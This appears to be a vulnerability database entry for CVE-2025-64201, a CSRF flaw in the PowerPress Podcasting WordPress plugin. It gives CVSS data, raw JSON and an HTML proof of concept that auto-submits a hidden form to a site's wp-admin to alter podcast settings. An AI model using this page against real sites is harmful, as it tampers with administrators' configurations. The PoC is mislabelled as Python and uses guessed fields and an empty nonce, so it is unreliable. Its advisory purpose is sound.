Security Vulnerability Report
中文
CVE-2025-64201 CVSS 4.3 MEDIUM

CVE-2025-64201

Published: 2025-10-29 09:15:40
Last Modified: 2026-04-27 16:16:35

Description

Cross-Site Request Forgery (CSRF) vulnerability in blubrry PowerPress Podcasting powerpress allows Cross Site Request Forgery.This issue affects PowerPress Podcasting: from n/a through <= 11.13.12.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

PowerPress Podcasting plugin (所有版本 <= 11.13.12)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-64201 - PowerPress Podcasting CSRF --> <!-- This PoC demonstrates how an attacker can trigger unwanted actions --> <!-- Deploy on attacker-controlled server and trick WordPress admin to visit --> <!DOCTYPE html> <html> <head> <title>Loading...</title> </head> <body> <h1>Page is loading, please wait...</h1> <!-- Example: Modify PowerPress settings via CSRF --> <form action="http://target-wordpress-site.com/wp-admin/admin.php" method="POST" id="csrf-form"> <input type="hidden" name="page" value="powerpress/powerpressadmin_basicpodcast.php"> <input type="hidden" name="action" value="powerpress-savesettings"> <input type="hidden" name="feed[title]" value="Malicious Podcast Feed"> <input type="hidden" name="feed[description]" value="Injected by CSRF attack"> <input type="hidden" name="_wpnonce" value=""> </form> <!-- Auto-submit form --> <script> document.getElementById('csrf-form').submit(); </script> </body> </html> <!-- Alternative: Hidden image tag for GET-based attacks --> <!-- <img src="http://target-site.com/wp-admin/admin.php?page=powerpress&action=delete&id=123" width="0" height="0"> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64201", "sourceIdentifier": "[email protected]", "published": "2025-10-29T09:15:40.150", "lastModified": "2026-04-27T16:16:34.740", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in blubrry PowerPress Podcasting powerpress allows Cross Site Request Forgery.This issue affects PowerPress Podcasting: from n/a through <= 11.13.12."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/powerpress/vulnerability/wordpress-powerpress-podcasting-plugin-11-13-12-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}